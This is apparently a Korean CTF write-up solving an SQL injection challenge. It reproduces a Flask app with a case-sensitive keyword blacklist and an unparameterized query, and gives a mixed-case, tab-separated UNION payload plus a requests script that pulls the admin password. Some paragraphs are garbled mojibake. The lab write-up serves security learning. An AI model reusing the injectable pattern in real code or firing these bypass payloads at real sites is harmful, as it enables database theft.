[2025-07-16] SQL injection Bypass WAF

🦥 본문

import os
from flask import Flask, request
from flask_mysqldb import MySQL

app = Flask(__name__)

# Connection settings are read from the environment variable of the same
# name. The literal fallbacks are placeholder credentials for the challenge
# container; nothing real should depend on them.
_DB_DEFAULTS = {
    'MYSQL_HOST': 'localhost',
    'MYSQL_USER': 'user',
    'MYSQL_PASSWORD': 'pass',
    'MYSQL_DB': 'users',
}
for setting, fallback in _DB_DEFAULTS.items():
    app.config[setting] = os.environ.get(setting, fallback)

mysql = MySQL(app)

# Blacklisted substrings. Note what is *not* here: upper/mixed-case variants
# of the words, tab/newline (only the plain space is listed) and the '#'
# comment marker.
keywords = ['union', 'select', 'from', 'and', 'or', 'admin', ' ', '*', '/']


def check_WAF(data):
    """Return True if ``data`` contains any entry of ``keywords``, else False.

    This is a case-sensitive substring blacklist and nothing more: ``'Admin'``
    and ``'UNION'`` pass, a tab is not covered by the ``' '`` entry, and a
    trailing ``#`` comment survives. The challenge is built around exactly
    these gaps; a real deployment must not treat this check as input
    validation and should use a parameterized query instead.
    """
    return any(blocked in data for blocked in keywords)

@app.route('/', methods=['POST', 'GET'])
def index():
    """Look up a user by the ``uid`` query parameter and render ``template``.

    ``template`` is defined outside this excerpt. Only ``result[1]`` — the
    second column of the fetched row — is rendered, so a UNION payload has to
    put the value it wants to read in that position. With no ``uid`` the bare
    template is returned.
    """
    uid = request.args.get('uid')
    if not uid:
        return template

    # The blacklist in check_WAF is the only control applied to the input.
    if check_WAF(uid):
        return 'your request has been blocked by WAF.'

    # SECURITY: uid is interpolated straight into the statement, so whatever
    # survives check_WAF runs as SQL. The real fix is
    #   cur.execute("SELECT * FROM user WHERE uid=%s;", (uid,))
    # It is kept as-is here because the writeup exploits exactly this line.
    # The cursor is also never closed.
    cur = mysql.connection.cursor()
    cur.execute(f"SELECT * FROM user WHERE uid='{uid}';")
    result = cur.fetchone()

    shown = result[1] if result else ''
    return template.format(uid=uid, result=shown)

if __name__ == '__main__':
    # Binds on every interface; acceptable inside the challenge container,
    # not for anything reachable from a hostile network.
    bind_address = '0.0.0.0'
    app.run(host=bind_address)

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค๋ฅผ ๋ณด๋‹ˆ column์€ idx, uid, upw๋กœ ๊ตฌ์„ฑ๋˜์–ด ์žˆ๋‹ค.

guest를 입력하면 result[1]인 guest 값만 출력되는 것을 볼 수 있다. admin의 비밀번호가 FLAG인데, admin 값은 필터링 되어 있었다 → ADmin 같은 대소문자 혼용으로 필터링 우회가 가능하다. check_WAF는 소문자 키워드에 대한 대소문자 구분 부분 문자열 검사일 뿐이고, MySQL의 기본 collation은 문자열 비교에서 대소문자를 구분하지 않으므로 DB 쪽에서는 'Admin'이 그대로 admin 행과 매칭된다.

๊ณต๋ฐฑ๋„ ํ•„ํ„ฐ๋ง์ด ๋˜์–ด ์žˆ์—ˆ๋‹ค. ์ฃผ์„์œผ๋กœ ๊ณต๋ฐฑ์„ ํ”ผํ•˜๋ ค ํ–ˆ์œผ๋‚˜ ์ฃผ์„ ์—ญ์‹œ ํ•„ํ„ฐ๋ง์ด ๋˜์–ด ์žˆ์—ˆ๋‹ค. ํƒญ์„ ์˜๋ฏธํ•˜๋Š” /t โ†’ %09๋ฅผ ํ†ตํ•ด ํ•„ํ„ฐ๋ง ์šฐํšŒ๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค

또한 UNION을 사용할 거면 앞의 구문과 column 수가 맞아야 한다. 테이블이 idx, uid, upw 3개 컬럼이므로 SELECT 항목도 3개여야 하고, 페이지가 result[1]만 출력하므로 읽고 싶은 upw를 두 번째 자리에 둔다.

' UNION SELECT null, upw, null FROM user WHERE uid='admiN'#

위와 같은 쿼리가 실행되도록 보내야 한다. '%09Union%09Select%09null,upw,null%09From%09user%09where%09uid="Admin"%23을 사이트의 form을 통해 보냈는 데 안되는 거다.. (페이로드 맨 앞은 반드시 직선 작은따옴표 ' 이어야 기존 문자열 리터럴이 닫힌다.)

풀이

'%09Union%09Select%09null,upw,null%09From%09user%09where%09uid=\"Admin\"%23

을 form을 통해 보내게 되면 이중 인코딩 처리가 되어서 %09가 %2509가 된다. 즉 브라우저가 입력값의 %를 %25로 한 번 더 URL 인코딩하고, 서버의 request.args는 한 번만 디코딩하므로 탭이 아니라 문자열 "%09"가 그대로 쿼리에 들어가 의도한 쿼리가 되지 않는다.

import requests

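# Challenge instance URL; host and port are per-session and will have expired.
url = "http://host8.dreamhack.games:16809/"

# Use a real tab character (\t) between tokens, not the text "%09": requests
# percent-encodes the parameter exactly once, the server decodes it back to a
# tab, and the blacklist only lists ' ', not tab. Typing %09 into the HTML
# form gets encoded a second time (%2509) and arrives as the literal "%09".
# Mixed case defeats the case-sensitive keyword list, and "#" comments out the
# trailing quote and semicolon of the original statement.
params = {
    "uid": "'\tUnion\tSelect\tnull,upw,null\tFrom\tuser\twhere\tuid=\"Admin\"#"
}

# A timeout keeps the script from hanging forever once the instance is gone.
response = requests.get(url, params=params, timeout=10)
print(response.text)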

을 통해 보내야 원하는 결과를 얻을 수 있다. requests가 파라미터를 한 번만 URL 인코딩하므로 실제 탭 문자(\t)가 %09로 전송되고, 서버에서는 다시 탭으로 디코딩되어 check_WAF의 ' ' 검사를 지나간다.

하… 이것도 모르고 똑같은 코드에 시간 엄청 썼다…
